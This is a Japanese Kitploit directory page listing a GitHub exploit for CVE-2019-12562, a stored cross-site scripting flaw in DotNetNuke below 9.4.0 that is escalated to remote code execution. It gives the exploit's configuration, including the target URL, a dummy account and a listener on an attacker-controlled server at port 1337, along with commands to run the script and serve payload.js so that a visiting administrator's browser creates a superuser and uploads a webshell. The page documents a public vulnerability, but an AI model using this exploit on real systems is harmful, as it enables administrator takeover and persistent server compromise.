Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-12562 — DotNetNuke (DNN) バージョン 9.4.0 未満における格納型クロスサイトスクリプティング | XSSからRCEへ | Kitploit
ツール/GitHubGitHub/mayaseven/cve-2019-12562
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubmayaseven/cve-2019-12562

CVE-2019-12562

DotNetNuke (DNN) バージョン 9.4.0 未満における格納型クロスサイトスクリプティング | XSSからRCEへ

リポジトリを見る
846年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-12562

CVE-2019-12562 DotNetNuke (DNN) バージョン 9.4.0 以前における格納型クロスサイトスクリプティングにより、リモート攻撃者が悪意のあるスクリプトを管理者通知ページに保存・埋め込むことが可能です。このエクスプロイトは、コンテンツ管理、ユーザー追加、サーバーへのバックドアアップロードなど、管理者権限で任意の操作を実行するために使用される可能性があります。管理者ユーザーが格納型クロスサイトスクリプティングを含む通知ページにアクセスした場合、エクスプロイトが成功します。

エクスプロイト

  • Config the exploit file
root@kitploit:~
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN"   # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
  • ターゲットが脆弱な場合、エクスプロイトを実行すると、XSSが埋め込まれたダミーユーザーが「Display Name」フィールドに登録され、payload.jsが取得されます。
root@kitploit:~
python3 CVE-2019-12562.py
  • webサーバーを起動し、その上にpayload.jsを配置して、管理者の接続を待つ必要があります。
root@kitploit:~
python -m SimpleHTTPServer 1337

このエクスプロイトは、スーパーユーザーを作成し、ターゲットサーバーにウェブシェルをアップロードします。

エクスプロイト条件 : 管理者ユーザーが通知ページにアクセスした場合、エクスプロイトが成功します。

詳細: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ CVE リファレンス: https://www.cvedetails.com/cve/CVE-2019-12562/

ツールをダウンロード